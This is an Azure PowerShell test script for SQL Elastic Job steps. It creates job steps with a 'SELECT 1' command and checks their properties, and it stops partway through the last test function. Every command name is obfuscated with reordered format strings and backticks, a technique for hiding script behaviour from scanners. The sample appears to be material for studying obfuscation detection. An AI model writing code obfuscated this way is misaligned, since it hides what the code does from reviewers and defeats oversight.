function Tes`T-CRE`A`TEJO`BSTep
{
	
	${A1} = &("{1}{2}{0}{4}{3}{5}{6}" -f 'cJobA','Create-E','lasti','iron','gentTestEnv','m','ent')

	try
	{
		&("{4}{2}{5}{0}{1}{3}"-f 'W','ithDefaul','t','tParam','Test-CreateJobS','ep') ${A1}
		&("{1}{7}{4}{6}{8}{0}{5}{3}{2}"-f 'Wi','T','rentObject','Pa','t-','th','Cr','es','eateJobStep') ${a`1}
		&("{5}{4}{1}{0}{6}{2}{3}"-f'bS','teJo','ithParentResour','ceId','st-Crea','Te','tepW') ${A1}
		&("{0}{3}{5}{6}{1}{2}{4}" -f'Te','St','epWithPipin','st','g','-Cr','eateJob') ${A`1}
	}
	finally
	{
		&("{7}{1}{2}{5}{6}{3}{4}{0}"-f 'oupForTest','mo','v','rc','eGr','e-Reso','u','Re') ${a1}
	}
}


function tesT`-`geTJO`BST`ep
{
	
	${A1} = &("{3}{6}{0}{2}{4}{1}{5}"-f 'Ela','nvir','sticJobAge','C','ntTestE','onment','reate-')

	try
	{
		&("{5}{0}{4}{2}{7}{1}{3}{6}" -f 'e','aultPa','GetJob','r','st-','T','am','StepWithDef') ${A`1}
		&("{1}{3}{0}{2}{4}{5}"-f'G','Tes','etJ','t-','obSte','pWithParentObject') ${a1}
		&("{4}{1}{2}{3}{8}{0}{6}{5}{7}" -f'Job','s','t','-','Te','WithParen','Step','tResourceId','Get') ${A`1}
		&("{2}{3}{4}{1}{0}"-f'ing','ithPip','Test-G','etJobS','tepW') ${a1}
	}
	finally
	{
		&("{3}{5}{6}{2}{4}{7}{1}{0}"-f't','es','ourc','Re','eGroup','mov','e-Res','ForT') ${A`1}
	}
}


function tEST-U`P`d`AT`eJOb`SteP
{
	
	${a`1} = &("{1}{6}{2}{0}{3}{5}{4}" -f 'gen','Create-E','sticJobA','tTes','nt','tEnvironme','la')

	try
	{
		&("{1}{2}{5}{3}{6}{0}{4}" -f 'ult','Test','-UpdateJ','StepWithDef','Param','ob','a') ${A`1}
		&("{6}{0}{5}{8}{7}{1}{4}{2}{3}" -f't','tepWit','u','tObject','hInp','eJ','Test-Upda','bS','o') ${a`1}
		&("{0}{1}{2}{4}{3}{5}" -f 'Test-Upd','a','teJ','urc','obStepWithReso','eId') ${A1}
		&("{4}{0}{5}{2}{6}{1}{3}"-f 'e','epWit','teJ','hPiping','T','st-Upda','obSt') ${a1}
	}
	finally
	{
		&("{4}{1}{3}{0}{2}" -f'ForTes','ResourceGro','t','up','Remove-') ${A1}
	}
}


function teST-`REm`o`VejObStep
{
	
	${a`1} = &("{0}{3}{7}{8}{6}{5}{4}{10}{9}{2}{1}" -f'Create-El','nment','o','a','es','bAgentT','o','st','icJ','r','tEnvi')

	try
	{
		&("{5}{8}{0}{2}{4}{3}{7}{6}{1}" -f 've','am','JobStepWith','e','D','Te','aultPar','f','st-Remo') ${A1}
		&("{4}{2}{1}{3}{5}{0}"-f'ect','t-RemoveJobStepWit','es','h','T','InputObj') ${a`1}
		&("{2}{7}{4}{0}{3}{5}{6}{1}" -f 'ithRes','ceId','Tes','o','emoveJobStepW','u','r','t-R') ${a`1}
		&("{3}{6}{5}{1}{4}{0}{2}{7}"-f 'Pi','Wit','pi','Test-Rem','h','tep','oveJobS','ng') ${A`1}
	}
	finally
	{
		&("{5}{0}{1}{2}{7}{6}{4}{3}" -f '-Reso','urc','eGr','t','Tes','Remove','pFor','ou') ${a`1}
	}
}


function teST-Cr`EAt`ej`oBstE`PwiTh`D`E`Fa`Ult`parAm (${a`1})
{
	
	${D`B1} = ${A`1} | &("{2}{1}{0}{3}{5}{6}{4}"-f 'Sql','eRm','Get-Azur','D','se','atab','a')
	${j`C1} = &("{2}{1}{0}{4}{6}{5}{3}"-f 'e-Jo','t','Crea','Test','bCr','ntialFor','ede') ${A`1}
	${T`G1} = &("{3}{1}{4}{2}{0}"-f'st','reate-Ta','upForTe','C','rgetGro') ${A`1}
	${J1} = &("{4}{2}{3}{1}{0}" -f'est','T','obFo','r','Create-J') ${A`1}
	${c`T1} = ("{0}{1}" -f 'SEL','ECT 1')
	${s`cH`emAnA`mE} = &("{0}{4}{1}{3}{2}" -f'Get','Schem','me','aNa','-')
	${T`AbL`En`AME} = &("{4}{2}{1}{3}{0}"-f'me','leN','-Tab','a','Get')

	
	${J`Sn1} = &("{2}{1}{0}{3}" -f 'bStepNa','t-Jo','Ge','me')
	${j`s1} = &("{2}{0}{5}{1}{3}{4}"-f 'd-','zSqlElast','Ad','icJob','Step','A') -ResourceGroupName ${a1}."R`eSOuRce`gRouPNA`ME" -ServerName ${a1}."SE`R`VERnaMe" -AgentName ${a1}."agENTN`A`ME" -JobName ${j`1}."J`OBN`AMe" -Name ${j`Sn1} -TargetGroupName ${t`g1}."Ta`RGETgr`oU`pN`AME" -CredentialName ${J`c1}."CR`EDE`N`TiaLnaMe" -CommandText ${C`T1}
	&("{1}{3}{0}{2}{4}"-f 'rt','As','-Ar','se','eEqual') ${j`s1}."rESO`U`R`CegRoU`pname" ${A1}."R`EsoUr`CeGroUpna`me"
	&("{3}{1}{4}{2}{0}" -f 'qual','er','reE','Ass','t-A') ${j`S1}."ser`VErN`AmE" ${a1}."S`ER`Ver`Name"
	&("{0}{1}{2}"-f'Assert-AreEq','ua','l') ${J`S1}."a`g`EnTNamE" ${A`1}."a`GE`N`TNaMe"
	&("{3}{1}{2}{4}{0}"-f'ual','t','-AreE','Asser','q') ${j`s1}."jo`BnAmE" ${j1}."JObN`AME"
	&("{3}{0}{2}{1}"-f 's','AreEqual','sert-','A') ${j`s1}."st`Epna`ME" ${js`N1}
	&("{0}{1}{2}{3}"-f'Asse','r','t-','AreEqual') ${J`s1}."ta`Rg`etgr`ou`PnaME" ${t`G1}."tA`Rg`etG`ROUpnAME"
	&("{2}{3}{0}{1}"-f't-AreE','qual','Ass','er') ${j`S1}."CrE`deN`Ti`A`LNAME" ${J`C1}."cr`EdeNtiA`l`NAMe"
	&("{2}{3}{0}{1}" -f'Are','Equal','Asse','rt-') ${J`S1}."COmmAndt`E`Xt" ${C`T1}
	&("{2}{3}{1}{0}" -f'-Null','ert','A','ss') ${J`s1}."o`Utput"

	
	${j`Sn1} = &("{3}{0}{2}{1}"-f 'St','me','epNa','Get-Job')
	${J`s1} = &("{7}{6}{2}{0}{3}{5}{1}{4}"-f'l','e','q','Elasti','p','cJobSt','zS','Add-A') -ResourceGroupName ${A`1}."r`esOUR`cE`groUPNA`ME" -ServerName ${A`1}."se`RvErna`Me" -AgentName ${A`1}."AGe`NTN`AmE" -JobName ${J`1}."jOB`N`AmE" -Name ${j`sN1} -TargetGroupName ${T`G1}."TAR`gEtg`ROu`pNaMe" -CredentialName ${J`C1}."Cr`E`denTIA`LNamE" -CommandText ${C`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseObject ${d`B1} -OutputTableName ${tabl`E`N`AME} -OutputCredentialName ${j`c1}."cReDeNt`IalN`A`me" -OutputSchemaName ${S`chEM`AnamE}
	&("{3}{4}{1}{0}{2}"-f'ua','Eq','l','Asse','rt-Are') ${J`S1}."rEsourc`E`G`RoUP`NaME" ${a`1}."REs`oURc`EGROUP`NAme"
	&("{3}{0}{4}{1}{2}" -f'er','AreE','qual','Ass','t-') ${j`S1}."S`er`VeRnAMe" ${a1}."seRV`E`RnA`ME"
	&("{0}{3}{1}{2}"-f 'A','t-AreEqu','al','sser') ${J`s1}."a`gEnt`NAME" ${a1}."A`gEn`TnAMe"
	&("{2}{0}{1}"-f 'ss','ert-AreEqual','A') ${j`S1}."jO`BNAme" ${J`1}."Jo`BN`AMe"
	&("{1}{2}{0}"-f 'ual','As','sert-AreEq') ${J`S1}."stepNa`Me" ${Js`N1}
	&("{2}{1}{0}{3}"-f'eE','r','Assert-A','qual') ${j`S1}."tARget`GRoU`pNAMe" ${T`G1}."tarGetGRo`Upn`A`me"
	&("{2}{0}{1}{4}{3}" -f'sert-','Ar','As','Equal','e') ${j`S1}."C`REdeNtIal`N`Ame" ${J`c1}."C`ReDEn`TI`AlNA`me"
	&("{1}{2}{0}{3}" -f 't-Are','Asse','r','Equal') ${J`S1}."TiMeOU`T`SEC`Onds" 1000
	&("{3}{2}{1}{4}{0}" -f 'l','rt-','sse','A','AreEqua') ${j`S1}."REtr`yATTEMp`TS" 100
	&("{1}{0}{2}{3}"-f't-A','Asser','re','Equal') ${J`s1}."In`iT`I`AlReT`R`YINTEr`VAL`s`ECONdS" 10
	&("{0}{1}{2}{3}{4}"-f 'Asse','r','t-Ar','eEq','ual') ${J`S1}."MAximuMr`e`Tr`YIN`TERVA`LSEc`ONDS" 1000
	&("{0}{2}{1}{3}" -f'Ass','E','ert-Are','qual') ${j`S1}."retrYINt`ErVa`lbA`cKOff`m`ULtIPLI`er" 5.0
	&("{3}{0}{2}{4}{1}" -f 'er','l','t-Ar','Ass','eEqua') ${j`s1}."OU`TPuT"."rEs`our`cEGrOUpn`AmE" ${D`B1}."rES`OU`RcegrOupn`A`ME"
	&("{3}{0}{1}{2}"-f 'sse','rt-AreEq','ual','A') ${j`S1}."out`Put"."SER`VerNA`me" ${d`B1}."SeRV`ERN`Ame"
	&("{1}{0}{2}{4}{3}"-f't','Asser','-','al','AreEqu') ${J`s1}."oU`TpUt"."daTabA`se`N`AME" ${d`B1}."DaT`ABa`sE`NaME"
	&("{0}{4}{1}{2}{3}"-f'A','-AreEq','u','al','ssert') ${J`S1}."Ou`TpUt"."sc`h`eMANAMe" ${schE`m`ANaMe}
	&("{2}{0}{3}{1}" -f'AreEq','l','Assert-','ua') ${J`s1}."ouTp`Ut"."taB`L`enaME" ${tAb`L`EN`AmE}
	&("{2}{0}{1}{3}" -f 'ss','ert-AreEq','A','ual') ${J`S1}."o`UTpUt"."C`R`EdEnTi`AL" ${j`c1}."CRedE`Nti`A`L`NamE"

	
	${Js`N1} = &("{2}{3}{1}{4}{0}"-f'ame','Step','Ge','t-Job','N')
	${J`s1} = &("{4}{2}{0}{1}{5}{3}"-f 'A','zS','d-','icJobStep','Ad','qlElast') -ResourceGroupName ${A1}."R`ESOu`RCeGR`oup`NAMe" -ServerName ${a`1}."s`eRverN`AME" -AgentName ${a`1}."aG`e`Nt`NaMe" -JobName ${j`1}."jObn`AMe" -Name ${JS`N1} -TargetGroupName ${T`G1}."tArgEtG`ROu`pnaMe" -CredentialName ${j`c1}."crEdE`NTIA`lnAME" -CommandText ${C`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseResourceId ${D`B1}."R`ESOuR`ceid" -OutputTableName ${t`AbL`EnaMe} -OutputCredentialName ${J`c1}."cRedenTi`Aln`Ame" -OutputSchemaName ${ScHE`m`AnAmE}
	&("{0}{3}{2}{1}" -f 'A','Equal','t-Are','sser') ${j`S1}."reSOuRcE`GrOu`pN`AMe" ${a`1}."Re`SoURC`EGrOU`pnAME"
	&("{3}{1}{2}{0}" -f'l','eEqu','a','Assert-Ar') ${J`s1}."SERvE`R`NamE" ${A`1}."s`er`VerN`AmE"
	&("{0}{4}{2}{1}{3}"-f'As','AreEqua','rt-','l','se') ${J`S1}."agENtna`mE" ${a1}."AgENt`NA`Me"
	&("{3}{4}{2}{0}{1}"-f'AreEq','ual','t-','Ass','er') ${J`S1}."Jobn`AME" ${J1}."j`ObNa`Me"
	&("{2}{1}{0}{3}" -f'-A','t','Asser','reEqual') ${j`S1}."St`ep`Name" ${Js`N1}
	&("{3}{1}{0}{2}" -f 'eEqu','Ar','al','Assert-') ${j`S1}."taRGetgR`OUp`NAME" ${t`G1}."t`ArGEtg`RO`U`pNAmE"
	&("{4}{2}{3}{0}{1}"-f 'qu','al','sser','t-AreE','A') ${J`S1}."cReDeNt`I`AL`NamE" ${J`C1}."C`R`eD`ENTiaLNAME"
	&("{0}{1}{2}{3}"-f 'Assert-A','r','e','Equal') ${j`S1}."T`imEo`UTS`eCONDS" 1000
	&("{3}{1}{0}{2}" -f'eEqu','ssert-Ar','al','A') ${j`S1}."re`TR`yAttEmPTs" 100
	&("{4}{1}{3}{0}{2}" -f 'u','rt-','al','AreEq','Asse') ${j`S1}."I`NIt`ialR`e`TRyINTE`RvAlSEC`ONdS" 10
	&("{1}{2}{3}{0}" -f'ual','A','ssert-AreE','q') ${j`s1}."ma`x`I`muMretR`y`INTE`RVALsEcO`N`DS" 1000
	&("{2}{0}{1}{3}" -f'sert-Ar','eEq','As','ual') ${j`s1}."rE`T`RYI`NtE`Rva`LbA`ckOFFmuLtiP`LIEr" 5.0
	&("{1}{2}{0}"-f 't-AreEqual','Ass','er') ${J`S1}."o`U`TpUt"."ReS`oUrC`E`GroupNAme" ${D`B1}."re`soURcEG`R`oUPnA`me"
	&("{1}{0}{3}{2}" -f 'ss','A','qual','ert-AreE') ${J`s1}."o`UTPUt"."s`E`Rvern`AME" ${d`B1}."SERveR`Na`mE"
	&("{1}{3}{0}{2}{4}"-f'Are','As','Equa','sert-','l') ${j`S1}."OU`T`puT"."DATAb`A`SEna`ME" ${d`B1}."dA`Ta`BASEnA`ME"
	&("{0}{3}{1}{2}{4}" -f'Assert-','u','a','AreEq','l') ${J`S1}."O`Ut`PUt"."S`CHEmA`NA`Me" ${s`Ch`e`MAnAme}
	&("{1}{0}{3}{2}"-f'-Ar','Assert','Equal','e') ${j`S1}."O`UT`PuT"."ta`BLEn`A`ME" ${TaB`lE`NAme}
	&("{0}{2}{3}{1}" -f'Asse','qual','rt','-AreE') ${J`S1}."Out`PuT"."CrE`dEn`TIAL" ${j`C1}."C`R`EDENti`ALNa`me"
}


function Test`-`cr`EATej`OBS`TEPW`ithpare`NTOBj`E`Ct (${A1})
{
	
	${D`B1} = ${a1} | &("{1}{4}{3}{0}{2}" -f'qlDatab','Get-A','ase','mS','zureR')
	${j`C1} = &("{1}{0}{2}{4}{3}{5}" -f 'ate-J','Cre','obC','ialForTes','redent','t') ${A`1}
	${T`g1} = &("{1}{7}{0}{6}{2}{4}{3}{5}"-f'ate-Ta','Cr','g','upFo','etGro','rTest','r','e') ${A1}
	${j`1} = &("{1}{2}{5}{0}{4}{3}" -f'bForTe','C','rea','t','s','te-Jo') ${a`1}
	${C`T1} = ("{1}{2}{0}"-f' 1','SELEC','T')
	${Sch`e`maN`AMe} = &("{1}{4}{3}{0}{2}"-f 'aN','G','ame','chem','et-S')
	${TA`B`lenAMe} = &("{1}{2}{3}{0}" -f 'ame','Get-Ta','bl','eN')

	
	${jS`N1} = &("{0}{3}{2}{4}{1}" -f'Get-Job','e','tepN','S','am')
	${J`S1} = &("{0}{6}{3}{4}{1}{2}{5}"-f 'Add-','astic','J','Sql','El','obStep','Az') -ParentObject ${J1} -Name ${J`Sn1} -TargetGroupName ${t`G1}."tA`R`G`eTG`RoupnamE" -CredentialName ${j`C1}."CRe`DENtI`AlN`A`ME" -CommandText ${c`T1}
	&("{0}{3}{2}{1}" -f 'Ass','eEqual','Ar','ert-') ${J`s1}."rE`sOurCEGR`O`Up`NaMe" ${A`1}."rE`SO`UrCEGR`OuPNAMe"
	&("{0}{2}{3}{1}" -f 'A','qual','ssert-Are','E') ${J`s1}."s`E`RvErNaMe" ${A`1}."se`R`VernAMe"
	&("{0}{1}{2}{3}" -f'As','sert','-AreEq','ual') ${j`S1}."A`GE`NTnaMe" ${a`1}."A`ge`NTnaMe"
	&("{2}{0}{1}{3}"-f 'se','rt-AreEqu','As','al') ${j`S1}."Job`N`AME" ${j1}."jOB`NA`Me"
	&("{0}{3}{2}{1}" -f'Asser','ual','AreEq','t-') ${J`S1}."S`TE`PNaMe" ${j`sn1}
	&("{1}{3}{2}{0}" -f 'ual','A','eEq','ssert-Ar') ${j`s1}."tArgetGr`Oup`NAme" ${T`G1}."tARgeT`gr`Ou`p`NAme"
	&("{1}{3}{0}{2}" -f's','A','ert-AreEqual','s') ${j`S1}."Cr`eD`enTIA`l`NaMe" ${j`C1}."CR`E`dEnT`Ialn`AME"
	&("{3}{2}{1}{0}" -f 'qual','AreE','ert-','Ass') ${j`s1}."C`oMmaNdt`EXT" ${c`T1}
	&("{3}{0}{2}{1}"-f'-N','ll','u','Assert') ${j`s1}."o`UT`put"

	
	${jS`N1} = &("{1}{2}{0}{3}" -f'bStepN','G','et-Jo','ame')
	${j`s1} = &("{0}{1}{3}{4}{5}{2}{7}{6}"-f'Add','-A','cJo','z','Sq','lElasti','p','bSte') -ParentObject ${j`1} -Name ${js`N1} -TargetGroupName ${t`G1}."TARGET`GROUpNa`me" -CredentialName ${J`c1}."Cr`e`dEntia`LNa`me" -CommandText ${c`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseObject ${D`B1} -OutputTableName ${taB`lENa`mE} -OutputCredentialName ${J`C1}."cReD`ENt`IalnA`ME" -OutputSchemaName ${S`CHEM`A`NAme}
	&("{3}{2}{0}{1}{4}" -f's','ert-AreEqu','s','A','al') ${j`s1}."R`e`sOUr`CeGR`OupNaME" ${a1}."RESou`RCeGroup`N`AmE"
	&("{0}{3}{1}{2}" -f'Assert-','qua','l','AreE') ${J`S1}."s`eRv`erNAme" ${A`1}."Se`RVe`R`NAME"
	&("{1}{0}{2}{3}"-f'sert-Ar','As','eEq','ual') ${j`s1}."AgeN`Tn`Ame" ${a`1}."AG`eNTN`AMe"
	&("{2}{0}{4}{1}{3}" -f'ssert-A','u','A','al','reEq') ${j`S1}."J`OBNAMe" ${J1}."jo`BN`AmE"
	&("{1}{0}{3}{2}" -f'ert-','Ass','l','AreEqua') ${j`s1}."S`TE`pNAmE" ${JS`N1}
	&("{1}{2}{3}{0}"-f 'ual','A','sse','rt-AreEq') ${J`s1}."taR`G`eTg`R`OupNamE" ${t`G1}."TAr`g`ETGro`UP`NAmE"
	&("{2}{0}{4}{3}{1}"-f'rt-A','al','Asse','eEqu','r') ${j`S1}."CrE`denTIaLn`Ame" ${j`C1}."crEd`ent`iAlNAme"
	&("{1}{2}{0}" -f'AreEqual','Assert','-') ${J`s1}."tImeOUt`seCon`dS" 1000
	&("{2}{3}{4}{1}{0}" -f 'al','AreEqu','A','sser','t-') ${J`s1}."ReTR`Y`ATtEmp`Ts" 100
	&("{1}{2}{0}{3}" -f 't-AreE','A','sser','qual') ${J`s1}."inITi`A`Lret`Ryin`TErVaLseC`ONDs" 10
	&("{2}{3}{1}{0}{4}"-f 'Ar','-','Ass','ert','eEqual') ${J`S1}."MaxImuM`RetRy`inteRV`A`LsECon`Ds" 1000
	&("{2}{1}{4}{3}{0}"-f'qual','sert-A','As','eE','r') ${J`S1}."RE`Tr`YiNTERVaL`BA`cK`oF`F`mULtiP`l`IeR" 5.0
	&("{4}{2}{0}{1}{3}"-f 'r','eEq','-A','ual','Assert') ${J`S1}."OUT`Put"."rES`oURceGr`oUPn`A`me" ${D`B1}."R`esouRc`eGr`O`UpNAmE"
	&("{0}{1}{2}{3}" -f'Asser','t-','Ar','eEqual') ${j`S1}."OuTP`UT"."S`eRVer`NaME" ${D`B1}."s`erV`erNamE"
	&("{2}{3}{1}{0}" -f 'l','reEqua','Assert','-A') ${J`S1}."Ou`Tp`Ut"."daTaba`sen`A`mE" ${D`B1}."D`ATAB`ASe`NamE"
	&("{2}{1}{0}{3}{4}" -f 'Ar','ssert-','A','eEqu','al') ${j`S1}."o`UTpUT"."s`cHE`ManamE" ${S`cHEm`AN`AMe}
	&("{1}{3}{2}{4}{0}"-f'ual','As','rt-AreE','se','q') ${J`s1}."OU`TpUt"."tAb`l`ENaME" ${tAB`l`eNa`me}
	&("{0}{1}{2}{3}" -f 'Assert-Are','Equ','a','l') ${j`s1}."o`U`TpUT"."c`ReD`Ent`iAl" ${J`c1}."C`R`eDeNTIA`lNAME"

	
	${JS`N1} = &("{2}{1}{3}{0}"-f 'me','t','Ge','-JobStepNa')
	${J`s1} = &("{4}{3}{1}{0}{2}" -f'bSte','cJo','p','SqlElasti','Add-Az') -ParentObject ${j`1} -Name ${js`N1} -TargetGroupName ${t`G1}."tA`Rge`TGRouPN`AmE" -CredentialName ${j`C1}."cRe`DENT`i`AlnaMe" -CommandText ${c`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseResourceId ${d`B1}."ReS`o`URcEID" -OutputTableName ${ta`B`leN`Ame} -OutputCredentialName ${j`C1}."CR`E`denTialNA`mE" -OutputSchemaName ${s`C`hemAnA`Me}
	&("{1}{4}{3}{0}{2}"-f 'eE','Assert-','qual','r','A') ${J`s1}."rE`sOUrce`GR`oU`pNAmE" ${a1}."r`ESo`URC`e`gr`ouPnAmE"
	&("{0}{1}{3}{2}" -f'As','ser','Equal','t-Are') ${j`S1}."se`RVErN`AMe" ${A1}."S`ErVER`N`AMe"
	&("{0}{2}{1}{3}"-f 'Assert-Are','ua','Eq','l') ${j`s1}."aG`EntN`AMe" ${A`1}."AGE`NTNA`me"
	&("{3}{1}{0}{2}{4}"-f'reEq','ssert-A','ua','A','l') ${J`s1}."j`oB`NAmE" ${j1}."J`ob`NAmE"
	&("{2}{0}{1}{4}{3}" -f 's','se','A','eEqual','rt-Ar') ${j`S1}."StePN`A`me" ${JS`N1}
	&("{2}{0}{3}{1}" -f '-','Equal','Assert','Are') ${J`s1}."T`ARgeT`g`RoU`PnAMe" ${t`g1}."tAr`Ge`TGRoupN`Ame"
	&("{4}{3}{0}{2}{1}"-f 'reE','l','qua','A','Assert-') ${J`s1}."c`RedeNtI`ALNA`ME" ${J`c1}."cREd`ENtIA`LNAME"
	&("{1}{2}{0}{3}" -f'AreEqu','Asse','rt-','al') ${j`s1}."TIMe`ouT`S`E`coNdS" 1000
	&("{2}{3}{0}{1}" -f'e','Equal','Asse','rt-Ar') ${J`S1}."ReTrYat`TEMP`Ts" 100
	&("{1}{2}{0}{3}{4}"-f'u','Ass','ert-AreEq','a','l') ${j`S1}."INi`T`IaLRE`TryI`NTErva`lsecOndS" 10
	&("{2}{0}{3}{1}" -f 's','t-AreEqual','As','er') ${J`S1}."max`imUM`RETR`yiNtE`Rv`Al`seconDS" 1000
	&("{1}{2}{3}{0}"-f 'qual','Asser','t-Ar','eE') ${j`S1}."Retr`YINT`eRvaLBAC`KoFFmUlTipLI`er" 5.0
	&("{1}{3}{2}{0}"-f 'Equal','Asse','re','rt-A') ${j`s1}."oUtp`Ut"."r`E`SOurcEG`ROupn`Ame" ${D`B1}."rE`S`Ourc`EG`RouPname"
	&("{2}{3}{0}{1}" -f 'e','Equal','Ass','ert-Ar') ${j`s1}."O`UTPuT"."s`ervE`Rn`Ame" ${d`B1}."SERvER`Na`mE"
	&("{2}{0}{4}{3}{1}"-f'sse','al','A','eEqu','rt-Ar') ${J`S1}."OuT`Put"."d`ATaB`ASe`NAme" ${d`B1}."dAta`B`As`ENAmE"
	&("{3}{0}{2}{1}"-f 't','l','-AreEqua','Asser') ${j`s1}."ou`TpuT"."scHem`ANA`ME" ${sc`hEm`A`NaMe}
	&("{4}{3}{2}{1}{0}"-f 'Equal','re','-A','sert','As') ${j`s1}."o`Utput"."TA`BLE`NamE" ${t`AbLEn`A`mE}
	&("{3}{1}{2}{0}" -f 'l','-Ar','eEqua','Assert') ${J`s1}."oUtP`Ut"."C`RedEn`Ti`AL" ${j`c1}."cRED`E`N`TIAlNAME"
}


function tEst-CrEAT`EJoBstEp`W`IT`HpARen`TresO`URcEID (${A`1})
{
	
	${d`B1} = ${A1} | &("{1}{4}{3}{5}{2}{6}{0}"-f'atabase','G','RmSq','zur','et-A','e','lD')
	${j`C1} = &("{0}{4}{1}{3}{2}" -f'Create-Job','ntialFor','est','T','Crede') ${A1}
	${t`g1} = &("{4}{2}{0}{3}{1}" -f'-Tar','est','te','getGroupForT','Crea') ${a1}
	${J1} = &("{2}{0}{3}{1}{4}" -f'te-Jo','ForTes','Crea','b','t') ${a1}
	${C`T1} = ("{0}{1}" -f'SELEC','T 1')
	${sCHEM`AN`AME} = &("{1}{0}{2}"-f 'et-SchemaN','G','ame')
	${T`A`B`LENamE} = &("{3}{1}{2}{0}"-f'Name','a','ble','Get-T')

	
	${j`SN1} = &("{3}{1}{2}{0}" -f'tepName','-Jo','bS','Get')
	${J`s1} = &("{3}{4}{1}{5}{2}{0}"-f 'Step','zS','ob','Add-','A','qlElasticJ') -ParentResourceId ${J`1}."reSo`Urce`ID" -Name ${JS`N1} -TargetGroupName ${T`g1}."tArg`e`T`gRoupnAME" -CredentialName ${J`c1}."creDE`NTiA`LNa`ME" -CommandText ${c`T1}
	&("{0}{2}{1}{3}" -f'Asser','eE','t-Ar','qual') ${J`s1}."RE`SoURCEgro`Up`NAme" ${A`1}."rE`S`ouRCE`gr`Oupname"
	&("{3}{2}{0}{1}" -f 'AreEqua','l','sert-','As') ${J`S1}."SEr`V`eRNamE" ${a1}."s`eRvEr`NA`Me"
	&("{0}{2}{3}{1}"-f'Assert-','l','AreEq','ua') ${j`S1}."AGe`Nt`Name" ${a1}."a`G`EnTn`AMe"
	&("{2}{3}{1}{4}{0}"-f'qual','r','Asse','rt-A','eE') ${J`S1}."job`NamE" ${J1}."jObn`Ame"
	&("{1}{2}{3}{4}{0}" -f 'al','As','s','er','t-AreEqu') ${j`s1}."sT`ep`NamE" ${J`sN1}
	&("{0}{3}{1}{2}{4}"-f'Ass','rt-A','reEqu','e','al') ${J`S1}."TA`Rg`etg`R`OuPNAMe" ${t`g1}."T`A`RgeTGR`OuPNaME"
	&("{0}{3}{1}{2}"-f'Assert-','reEq','ual','A') ${j`S1}."CreD`E`NtIALNAmE" ${j`C1}."CreDE`NTi`A`lNAme"
	&("{3}{1}{0}{2}" -f'ert-AreEq','ss','ual','A') ${J`S1}."COmmA`NDt`EXT" ${c`T1}
	&("{1}{2}{0}" -f 'ull','As','sert-N') ${j`S1}."OUT`p`UT"

	
	${js`N1} = &("{3}{1}{0}{2}"-f'epNam','t','e','Get-JobS')
	${J`s1} = &("{4}{1}{3}{0}{2}"-f'JobSt','d-AzSql','ep','Elastic','Ad') -ParentResourceId ${J1}."R`EsOurC`EID" -Name ${js`N1} -TargetGroupName ${t`G1}."TAr`GETGrouPna`ME" -CredentialName ${J`c1}."cRed`eNt`I`ALn`Ame" -CommandText ${C`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseObject ${D`B1} -OutputTableName ${TAb`lEn`AMe} -OutputCredentialName ${j`C1}."CRedEn`T`ia`lname" -OutputSchemaName ${s`CH`eMan`AME}
	&("{0}{3}{1}{2}" -f 'Ass','u','al','ert-AreEq') ${j`S1}."R`ESourcegR`o`UPN`Ame" ${A1}."r`es`ource`GROU`PNAME"
	&("{3}{1}{0}{2}"-f 'a','u','l','Assert-AreEq') ${j`s1}."s`E`RveRnaME" ${a`1}."S`eRve`R`Name"
	&("{2}{1}{0}" -f'Equal','e','Assert-Ar') ${j`S1}."aGEnTN`A`me" ${A1}."Age`NT`NaME"
	&("{0}{1}{2}{3}"-f 'A','sser','t','-AreEqual') ${j`s1}."JObNA`Me" ${j`1}."JobN`AMe"
	&("{0}{2}{3}{1}"-f 'A','al','sse','rt-AreEqu') ${j`s1}."StEpn`A`Me" ${Js`N1}
	&("{1}{2}{0}" -f 'Equal','Assert-A','re') ${J`s1}."TaR`g`e`TGrOUpNAmE" ${T`g1}."tA`Rg`ETG`ROupnA`mE"
	&("{0}{3}{1}{4}{2}"-f'Ass','-','al','ert','AreEqu') ${J`S1}."CReDENt`ialn`A`mE" ${j`C1}."c`REde`NtiA`lNAmE"
	&("{2}{3}{0}{1}" -f 'ert','-AreEqual','A','ss') ${j`S1}."TImeoUT`S`ecoNDs" 1000
	&("{2}{3}{0}{4}{1}"-f 'ert','eEqual','A','ss','-Ar') ${j`s1}."r`E`TRyAt`TEmpts" 100
	&("{3}{1}{2}{0}"-f'eEqual','er','t-Ar','Ass') ${j`S1}."in`ITIalr`ET`RyintErVaLs`e`cONds" 10
	&("{4}{2}{1}{0}{3}" -f'ert-AreE','s','s','qual','A') ${j`S1}."ma`XI`Mu`mReTr`YinTeRv`ALsEcoNDs" 1000
	&("{4}{0}{3}{1}{2}" -f'r','q','ual','eE','Assert-A') ${J`s1}."Re`TrYI`N`T`eRvA`L`BACKoF`FMUl`Ti`PlIEr" 5.0
	&("{2}{4}{3}{0}{1}"-f 'q','ual','As','rt-AreE','se') ${J`S1}."oU`TP`Ut"."R`ESO`U`Rce`groupNA`mE" ${d`B1}."rESouRC`EGROUp`N`A`mE"
	&("{2}{0}{1}{3}" -f 'sert-Ar','eEq','As','ual') ${j`S1}."outp`Ut"."SERVE`Rn`A`ME" ${D`B1}."S`Erve`RNAme"
	&("{1}{2}{4}{3}{0}" -f'ual','A','sser','eEq','t-Ar') ${j`s1}."o`U`TPuT"."d`Ata`Ba`senAmE" ${d`B1}."dAt`A`BAsen`AmE"
	&("{4}{1}{0}{2}{3}"-f 't-','er','AreEq','ual','Ass') ${j`S1}."OuT`pUT"."schEmaN`A`me" ${S`cH`eMa`NaMe}
	&("{3}{2}{4}{1}{0}" -f'al','-AreEqu','sse','A','rt') ${J`S1}."o`UTPUT"."TA`BLEn`AMe" ${TA`B`lEName}
